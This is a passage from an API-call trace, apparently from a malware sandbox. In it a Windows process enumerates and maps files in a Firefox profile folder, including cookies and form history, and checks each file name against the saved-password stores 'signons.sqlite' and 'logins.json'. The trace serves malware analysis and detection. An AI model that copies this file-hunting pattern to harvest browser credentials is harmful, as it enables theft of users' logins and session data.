0x57b840 [0587.822] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0587.823] CloseHandle (hObject=0x5b4) returned 1 [0587.823] CloseHandle (hObject=0x4d8) returned 1 [0587.823] LocalFree (hMem=0x5d7dc8) returned 0x0 [0587.823] StrStrIW (lpFirst="cert8.db", lpSrch="signons.sqlite") returned 0x0 [0587.823] StrStrIW (lpFirst="cert8.db", lpSrch="logins.json") returned 0x0 [0587.823] LocalFree (hMem=0x5d7c90) returned 0x0 [0587.823] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfc0 | out: lpFindFileData=0x52dfc0) returned 1 [0587.823] lstrlenW (lpString="\\") returned 1 [0587.823] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0587.823] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c38 [0587.823] lstrlenW (lpString="compatibility.ini") returned 17 [0587.823] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0587.823] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x56afc8 [0587.823] LocalFree (hMem=0x578c38) returned 0x0 [0587.823] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\compatibility.ini"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0587.824] CloseHandle (hObject=0x4d8) returned 1 [0587.824] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5e [0587.824] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x56c300 [0587.824] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini", lpDst=0x56c300, nSize=0x5e | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini") returned 0x5e [0587.824] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\compatibility.ini"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0587.824] CloseHandle (hObject=0x4d8) returned 1 [0587.824] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\compatibility.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0587.824] GetFileSize (in: hFile=0x4d8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xce [0587.824] CreateFileMappingW (hFile=0x4d8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x5b4 [0587.824] MapViewOfFile (hFileMappingObject=0x5b4, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0587.825] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57b0f0 [0587.825] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0587.825] CloseHandle (hObject=0x5b4) returned 1 [0587.825] CloseHandle (hObject=0x4d8) returned 1 [0587.825] LocalFree (hMem=0x56c300) returned 0x0 [0587.825] StrStrIW (lpFirst="compatibility.ini", lpSrch="signons.sqlite") returned 0x0 [0587.825] StrStrIW (lpFirst="compatibility.ini", lpSrch="logins.json") returned 0x0 [0587.825] LocalFree (hMem=0x56afc8) returned 0x0 [0587.825] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfc0 | out: lpFindFileData=0x52dfc0) returned 1 [0587.825] lstrlenW (lpString="\\") returned 1 [0587.825] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0587.825] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c38 [0587.825] lstrlenW (lpString="content-prefs.sqlite") returned 20 [0587.825] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0587.825] LocalAlloc (uFlags=0x40, uBytes=0x142) returned 0x5d7c90 [0587.825] LocalFree (hMem=0x578c38) returned 0x0 [0587.825] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\content-prefs.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0587.826] CloseHandle (hObject=0x4d8) returned 1 [0587.826] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x61 [0587.826] LocalAlloc (uFlags=0x40, uBytes=0x142) returned 0x5d7de0 [0587.826] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite", lpDst=0x5d7de0, nSize=0x61 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite") returned 0x61 [0587.826] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\content-prefs.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0587.826] CloseHandle (hObject=0x4d8) returned 1 [0587.826] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\content-prefs.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0587.826] GetFileSize (in: hFile=0x4d8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x38000 [0587.826] CreateFileMappingW (hFile=0x4d8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x5b4 [0587.826] MapViewOfFile (hFileMappingObject=0x5b4, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0587.902] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57ad00 [0587.902] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0587.904] CloseHandle (hObject=0x5b4) returned 1 [0587.904] CloseHandle (hObject=0x4d8) returned 1 [0587.904] LocalFree (hMem=0x5d7de0) returned 0x0 [0587.904] StrStrIW (lpFirst="content-prefs.sqlite", lpSrch="signons.sqlite") returned 0x0 [0587.904] StrStrIW (lpFirst="content-prefs.sqlite", lpSrch="logins.json") returned 0x0 [0587.904] LocalFree (hMem=0x5d7c90) returned 0x0 [0587.904] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfc0 | out: lpFindFileData=0x52dfc0) returned 1 [0587.904] lstrlenW (lpString="\\") returned 1 [0587.904] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0587.904] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c38 [0587.904] lstrlenW (lpString="cookies.sqlite") returned 14 [0587.904] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0587.904] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x5d7c90 [0587.904] LocalFree (hMem=0x578c38) returned 0x0 [0587.904] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cookies.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0587.904] CloseHandle (hObject=0x4d8) returned 1 [0587.905] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5b [0587.905] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x5d7dd0 [0587.905] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite", lpDst=0x5d7dd0, nSize=0x5b | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite") returned 0x5b [0587.905] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cookies.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0587.905] CloseHandle (hObject=0x4d8) returned 1 [0587.905] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cookies.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0587.905] GetFileSize (in: hFile=0x4d8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x80000 [0587.905] CreateFileMappingW (hFile=0x4d8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x5b4 [0587.905] MapViewOfFile (hFileMappingObject=0x5b4, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x2c00000 [0587.913] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57ad90 [0587.913] UnmapViewOfFile (lpBaseAddress=0x2c00000) returned 1 [0587.918] CloseHandle (hObject=0x5b4) returned 1 [0587.918] CloseHandle (hObject=0x4d8) returned 1 [0587.918] LocalFree (hMem=0x5d7dd0) returned 0x0 [0587.918] StrStrIW (lpFirst="cookies.sqlite", lpSrch="signons.sqlite") returned 0x0 [0587.918] StrStrIW (lpFirst="cookies.sqlite", lpSrch="logins.json") returned 0x0 [0587.918] LocalFree (hMem=0x5d7c90) returned 0x0 [0587.918] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfc0 | out: lpFindFileData=0x52dfc0) returned 1 [0587.918] lstrlenW (lpString="\\") returned 1 [0587.918] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0587.918] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c38 [0587.918] lstrlenW (lpString="downloads.sqlite") returned 16 [0587.918] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0587.918] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x56afc8 [0587.918] LocalFree (hMem=0x578c38) returned 0x0 [0587.918] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\downloads.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0587.921] CloseHandle (hObject=0x4d8) returned 1 [0587.921] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5d [0587.921] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x56c300 [0587.921] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite", lpDst=0x56c300, nSize=0x5d | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite") returned 0x5d [0587.921] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\downloads.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0587.921] CloseHandle (hObject=0x4d8) returned 1 [0587.921] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\downloads.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0587.921] GetFileSize (in: hFile=0x4d8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x18000 [0587.921] CreateFileMappingW (hFile=0x4d8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x5b4 [0587.921] MapViewOfFile (hFileMappingObject=0x5b4, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0587.941] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57b690 [0587.941] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0587.942] CloseHandle (hObject=0x5b4) returned 1 [0587.942] CloseHandle (hObject=0x4d8) returned 1 [0587.942] LocalFree (hMem=0x56c300) returned 0x0 [0587.942] StrStrIW (lpFirst="downloads.sqlite", lpSrch="signons.sqlite") returned 0x0 [0587.942] StrStrIW (lpFirst="downloads.sqlite", lpSrch="logins.json") returned 0x0 [0587.942] LocalFree (hMem=0x56afc8) returned 0x0 [0587.942] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfc0 | out: lpFindFileData=0x52dfc0) returned 1 [0587.942] lstrlenW (lpString="\\") returned 1 [0587.942] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0587.942] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c38 [0587.942] lstrlenW (lpString="extensions.ini") returned 14 [0587.943] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0587.943] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x5d7c90 [0587.943] LocalFree (hMem=0x578c38) returned 0x0 [0587.943] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.ini"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0587.943] CloseHandle (hObject=0x4d8) returned 1 [0587.943] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5b [0587.943] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x5d7dd0 [0587.943] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini", lpDst=0x5d7dd0, nSize=0x5b | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini") returned 0x5b [0587.943] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.ini"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0587.943] CloseHandle (hObject=0x4d8) returned 1 [0587.944] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0587.944] GetFileSize (in: hFile=0x4d8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x8d [0587.944] CreateFileMappingW (hFile=0x4d8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x5b4 [0587.944] MapViewOfFile (hFileMappingObject=0x5b4, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0587.945] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57b960 [0587.945] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0587.945] CloseHandle (hObject=0x5b4) returned 1 [0587.945] CloseHandle (hObject=0x4d8) returned 1 [0587.945] LocalFree (hMem=0x5d7dd0) returned 0x0 [0587.945] StrStrIW (lpFirst="extensions.ini", lpSrch="signons.sqlite") returned 0x0 [0587.945] StrStrIW (lpFirst="extensions.ini", lpSrch="logins.json") returned 0x0 [0587.945] LocalFree (hMem=0x5d7c90) returned 0x0 [0587.945] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfc0 | out: lpFindFileData=0x52dfc0) returned 1 [0587.945] lstrlenW (lpString="\\") returned 1 [0587.945] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0587.945] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c38 [0587.945] lstrlenW (lpString="extensions.sqlite") returned 17 [0587.945] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0587.945] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x56afc8 [0587.945] LocalFree (hMem=0x578c38) returned 0x0 [0587.945] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0587.946] CloseHandle (hObject=0x4d8) returned 1 [0587.946] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5e [0587.946] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x56c300 [0587.946] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite", lpDst=0x56c300, nSize=0x5e | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite") returned 0x5e [0587.946] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0587.946] CloseHandle (hObject=0x4d8) returned 1 [0587.946] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0587.946] GetFileSize (in: hFile=0x4d8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x70000 [0587.946] CreateFileMappingW (hFile=0x4d8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x5b4 [0587.946] MapViewOfFile (hFileMappingObject=0x5b4, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x2c00000 [0588.025] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57b9f0 [0588.025] UnmapViewOfFile (lpBaseAddress=0x2c00000) returned 1 [0588.028] CloseHandle (hObject=0x5b4) returned 1 [0588.028] CloseHandle (hObject=0x4d8) returned 1 [0588.029] LocalFree (hMem=0x56c300) returned 0x0 [0588.029] StrStrIW (lpFirst="extensions.sqlite", lpSrch="signons.sqlite") returned 0x0 [0588.029] StrStrIW (lpFirst="extensions.sqlite", lpSrch="logins.json") returned 0x0 [0588.029] LocalFree (hMem=0x56afc8) returned 0x0 [0588.029] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfc0 | out: lpFindFileData=0x52dfc0) returned 1 [0588.029] lstrlenW (lpString="\\") returned 1 [0588.029] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0588.029] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c38 [0588.029] lstrlenW (lpString="formhistory.sqlite") returned 18 [0588.029] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0588.029] LocalAlloc (uFlags=0x40, uBytes=0x13e) returned 0x56afc8 [0588.029] LocalFree (hMem=0x578c38) returned 0x0 [0588.029] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\formhistory.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0588.029] CloseHandle (hObject=0x4d8) returned 1 [0588.029] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5f [0588.029] LocalAlloc (uFlags=0x40, uBytes=0x13e) returned 0x56c300 [0588.029] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite", lpDst=0x56c300, nSize=0x5f | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite") returned 0x5f [0588.029] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\formhistory.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0588.029] CloseHandle (hObject=0x4d8) returned 1 [0588.029] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\formhistory.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0588.029] GetFileSize (in: hFile=0x4d8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x30000 [0588.029] CreateFileMappingW (hFile=0x4d8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x5b4 [0588.029] MapViewOfFile (hFileMappingObject=0x5b4, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0588.055] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57ba80 [0588.055] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0588.057] CloseHandle (hObject=0x5b4) returned 1 [0588.057] CloseHandle (hObject=0x4d8) returned 1 [0588.057] LocalFree 